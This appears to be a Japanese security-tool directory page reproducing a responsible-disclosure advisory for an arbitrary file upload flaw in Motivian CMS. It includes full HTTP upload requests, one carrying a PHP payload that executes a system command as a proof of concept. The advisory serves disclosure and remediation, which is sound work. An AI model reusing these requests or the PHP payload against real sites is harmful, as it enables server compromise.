Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — このリポジトリは、Motivian Content Management System v.41.0.0で発見されたセキュリティ脆弱性を公開しています。 | Kitploit
ツール/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

このリポジトリは、Motivian Content Management System v.41.0.0で発見されたセキュリティ脆弱性を公開しています。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29093-Arbitrary-File-Upload

このリポジトリは、Motivian Content Management System v.41.0.0 で発見されたセキュリティ脆弱性を公開するものです。

  • CVE-2025-29093: 任意のファイルアップロード(Arbitrary File Upload)

この脆弱性は、責任ある開示(responsible disclosure)の慣行に従ってベンダーとMITREに報告されました。MITREは暫定CVE IDを割り当てました。詳細は45日間の開示期間の満了後に公開されます。

一般情報

  • タイトル: Motivian Arbitrary File Upload
  • 脆弱性タイプ: 任意のファイルアップロード(Arbitrary File Upload)
  • 製品ベンダー: Motivian
  • 製品: Motivian Content Management System
  • 影響を受けるバージョン: Motivian CMS v.41.0.0
  • 影響を受けるコンポーネント: Content/Gallery/Images
  • 攻撃ベクトル: リモート
  • 影響: 悪意のある任意ファイルのアップロード
  • 深刻度: 中(Medium)
  • CVSSv3スコア: 6.5
  • CVSSv3ベクター: CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
  • CISA-ADPによる深刻度: 高(High)
  • CISA-ADPによるCVSSv3スコア: 8.2
  • CISA-ADPによるCVSSv3ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
  • 発見日: 2025-02-03
  • 発見者: Francesco Marcuccio
  • ステータス: 2025年4月7日にベンダーへ報告 - 2025年5月22日時点で返答・修正なし

説明

Motivian Content Management System v.41.0.0 のファイルアップロード脆弱性により、リモートの攻撃者が コンポーネントを介して、悪意のあるコードを含む細工された拡張子(例: 、、)の任意のファイルをアップロードできる可能性があります。

Content/Gallery/Images
.php
.png
.txt

実証コード(Proof Of Concept)

この脆弱性は、さまざまな拡張子を持つファイルをアップロードすることで悪用される可能性があります。実証目的のため、2つの概念実証ケースが使用されました。1つは悪意のあるコードを含む .php ファイル、もう1つは EICAR テスト文字列を使用した .txt ファイルです。両方のファイルは Content/Gallery/Images コンポーネントを介してアップロードされました。

以下は、この問題を実証するために使用されたHTTPリクエストとレスポンスの完全な転写です。

Burp Request EICAR

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--

Burp Request PHP

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--

Burp Response

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729

修復策(Remediation)

ユーザーによる任意のファイルのアップロードを許可しないでください。厳格なファイル検証(MIMEタイプとコンテンツの検査)を実装し、ファイル名をランダム化し、アップロードディレクトリを制限してください。

開示タイムライン

日付対応
2025-02-06CVE IDリクエスト(CNA: MITRE)
2025-04-02CVE ID割り当て
2025-04-07脆弱性をベンダーへ報告
2025-05-3145日間の開示期間の満了後(合計54日間)に公開
2025-06-04MITREデータベースおよびNIST/NVDポータルへの公式登録と掲載

クレジット

  • 発見者および責任ある開示者:
    Francesco Marcuccio
    サイバーセキュリティコンサルタント、ペネトレーションテスター

  • MITREの発見者帰属として記載:
    Francesco Marcuccio
    サイバーセキュリティコンサルタント、ペネトレーションテスター

リンク

参照リンク: MITRE NIST

ステータス

このCVE IDは公式にPUBLISHEDステータスです。NISTによる分析後、CVSSスコアが更新される予定です。

ツールをダウンロード